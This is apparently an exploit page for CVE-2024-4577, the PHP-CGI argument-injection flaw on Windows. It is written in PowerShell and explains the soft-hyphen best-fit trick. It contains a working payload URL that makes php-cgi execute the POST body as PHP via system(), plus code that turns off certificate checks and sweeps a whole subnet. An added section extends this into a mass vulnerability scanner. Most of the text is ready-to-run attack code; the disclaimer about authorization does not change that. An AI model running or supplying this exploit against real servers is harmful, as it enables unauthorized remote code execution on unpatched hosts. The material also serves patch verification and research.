## https://sploitus.com/exploit?id=39A24297-B467-50B1-929D-726A66E04E5C
# CVE-2024-4577_PowerShell
**Note:
Make sure you are authorized to perform this kind of penetration testing in the target environment; using attack techniques without authorization may violate the law.
This program is for educational and research purposes only; use it within legal and ethical bounds.
If you do not understand the consequences penetration testing can have, consider hiring red-team professionals to run the test.**
## Description
First, disable TLS certificate validation so that self-signed certificates on targets do not abort the HTTPS requests. This `ServicePointManager` callback only affects Windows PowerShell 5.1; on PowerShell 7 it is ignored, and you pass `-SkipCertificateCheck` to `Invoke-WebRequest` instead.
```powershell
# Accept any server certificate (Windows PowerShell 5.1 only; see note above)
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```
The main attack payload. The query string has no `=`, so the CGI handler splits it on `+` and passes it to php-cgi.exe as command-line arguments. `%ad` is the soft-hyphen byte (0xAD): php-cgi rejects query-string arguments that start with `-`, but on Windows the best-fit character conversion turns 0xAD into `-` after that check, so php-cgi ends up running with `-d allow_url_include=on -d auto_prepend_file=php://input -d cgi.force_redirect=0` and executes the POST body as PHP (see the devcore writeup in the references).
```powershell
# %ad -> '-' via Windows best-fit mapping, giving: -d allow_url_include=on -d auto_prepend_file=php://input -d cgi.force_redirect=0
$url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
# PHP code sent in the request body; auto_prepend_file=php://input makes php-cgi execute it
$body = "<?php system('whoami'); die(); ?>"
```
Wrap it in a function and send it with PowerShell's built-in `Invoke-WebRequest` (adjust `TimeoutSec` as needed). Note that `Invoke-WebRequest` throws on non-2xx responses and on timeouts, so the `catch` branch returns the exception message rather than a response body.
```powershell
function Invoke-RequestForIP {
    param (
        [string]$IP,        # target host (or host:port)
        [string]$Protocol   # "http" or "https"
    )
    # Argument-injection payload: %ad becomes '-' on Windows, so php-cgi.exe receives the -d options
    $url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
    # PHP executed through auto_prepend_file=php://input on a vulnerable host
    $body = "<?php system('whoami'); die(); ?>"
    try {
        $response = Invoke-WebRequest -Uri $url -Method Post -Body $body -UseBasicParsing -TimeoutSec 2
        return $response.Content          # output of whoami if the host is vulnerable
    } catch {
        return $_.Exception.Message       # timeout, connection error, or non-2xx status
    }
}
```
Loop over 10.0.0.1 through 10.0.0.255, trying both http and https for each address. The loop is sequential, so with two protocols and a 2-second timeout a full /24 can take up to about 17 minutes; 10.0.0.255 is also the broadcast address of a /24 and will never answer.
```powershell
$baseIP = "10.0.0."
$start = 1
$end = 255
for ($i = $start; $i -le $end; $i++) {
    $currentIP = $baseIP + $i
    # try plain HTTP and HTTPS on every address
    foreach ($protocol in @("http", "https")) {
        $result = Invoke-RequestForIP -IP $currentIP -Protocol $protocol
        Write-Output "IP: $currentIP, Protocol: $protocol, Result: $result"
    }
}
```
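The loop above prints raw `whoami` output or an exception message, which is awkward to triage across a whole subnet. The following is an added example, not part of this repository, that keeps the page's URL path and argument-injection payload but swaps the body for an `echo` of a random marker, so a host is reported as vulnerable only when the marker comes back in the response. It also picks the right certificate-bypass mechanism for the PowerShell version and returns objects instead of strings. The function names, the marker scheme, and the 10.0.0.0/24 target list are my assumptions; replace the list with hosts you are authorized to test.

```powershell
# Added example (not from the original repo): CVE-2024-4577 checker with deterministic detection.
# Assumptions: the /php-cgi/php-cgi.exe path and %ad argument-injection payload are the page's;
# Test-Cve20244577, Invoke-Cve20244577Scan and the marker-based body are mine.

function Test-Cve20244577 {
    param(
        [Parameter(Mandatory)][string]$Target,                   # host or host:port
        [ValidateSet('http', 'https')][string]$Protocol = 'http',
        [int]$TimeoutSec = 5
    )
    # Random marker: a hit cannot be confused with a page that merely echoes the request back.
    $marker = [guid]::NewGuid().ToString('N')
    # %ad = soft hyphen (0xAD); Windows best-fit maps it to '-' after php-cgi's leading-dash check.
    $url  = "${Protocol}://$Target/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
    $body = "<?php echo '$marker'; die(); ?>"

    $params = @{
        Uri             = $url
        Method          = 'Post'
        Body            = $body
        UseBasicParsing = $true
        TimeoutSec      = $TimeoutSec
        ErrorAction     = 'Stop'
    }
    if ($PSVersionTable.PSVersion.Major -ge 6) {
        # PowerShell 7 ignores ServicePointManager; use the cmdlet switch instead
        $params.SkipCertificateCheck = $true
    } else {
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    }

    $code = $null
    try {
        $resp = Invoke-WebRequest @params
        $code = [int]$resp.StatusCode
        if ($resp.Content -like "*$marker*") {
            $status = 'VULNERABLE'           # our PHP ran and printed the marker
        } else {
            $status = 'not vulnerable (marker not echoed)'
        }
    } catch {
        # Timeout, refused connection, or non-2xx status (php-cgi error page, 404, etc.)
        if ($_.Exception.Response) { $code = [int]$_.Exception.Response.StatusCode }
        $status = "error: $($_.Exception.Message)"
    }

    [pscustomobject]@{
        Target     = $Target
        Protocol   = $Protocol
        StatusCode = $code
        Status     = $status
    }
}

function Invoke-Cve20244577Scan {
    param(
        [Parameter(Mandatory)][string[]]$Targets,
        [string[]]$Protocols = @('http', 'https'),
        [int]$TimeoutSec = 5
    )
    foreach ($t in $Targets) {
        foreach ($p in $Protocols) {
            Test-Cve20244577 -Target $t -Protocol $p -TimeoutSec $TimeoutSec
        }
    }
}

# Constructed target list (hosts 1-254; .0 and .255 are network/broadcast in a /24).
$targets = 1..254 | ForEach-Object { "10.0.0.$_" }
$results = Invoke-Cve20244577Scan -Targets $targets -TimeoutSec 2
$results | Where-Object Status -eq 'VULNERABLE' | Format-Table -AutoSize
```

Because the scan emits objects, the full result set can be kept (`$results | Export-Csv scan.csv`) while only confirmed hits are shown; an `error:` status with no `StatusCode` means the host never answered, whereas a `StatusCode` of 404 or 500 means something is listening on that path but did not run the payload.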
# References
<https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability>
<https://nvd.nist.gov/vuln/detail/cve-2024-4577>